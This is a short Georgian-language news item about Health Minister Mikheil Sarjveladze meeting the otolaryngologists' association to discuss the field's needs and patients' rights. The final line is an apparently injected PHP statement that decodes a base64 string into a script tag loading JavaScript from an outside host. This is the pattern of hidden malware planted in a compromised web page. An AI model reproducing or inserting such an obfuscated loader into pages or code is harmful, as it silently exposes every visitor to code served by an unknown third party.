celsiusi
ავერსი შნაიდერი

ჯანდაცვის მინისტრი მიხეილ სარჯველაძე ოტორინოლარინგოლოგთა ასოციაციის წევრებს შეხვდა. ამის შესახებ ინფორმაციას ჯანდაცვის სამინისტრო ავრცელებს.

მათივე ცნობით, მხარეებმა, ამ მიმართულებით არსებული საჭიროებები და დარგისთვის აქტუალური საკითხები განიხილეს.

„როგორც შეხვედრაზე აღინიშნა, სახელმწიფოს მთავარი პრიორიტეტი პაციენტთა ინტერესებისა და უფლებების დაცვაა. თუმცა, ამავდროულად, მნიშვნელოვანია სამედიცინო სექტორის ინტერესების გათვალისწინება.

შეხვედრაზე დარგის მეტად განვითარებისთვის აუცილებელი საკითხებიც განიხილეს. იმსჯელეს სამომავლოდ აქტუალური საკითხების ერთობლივად მოგვარებასა და კიდევ უფრო მჭიდრო თანამშრომლობაზე“, - ნათქვამია გავრცელებულ ინფორმაციაში.

123
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");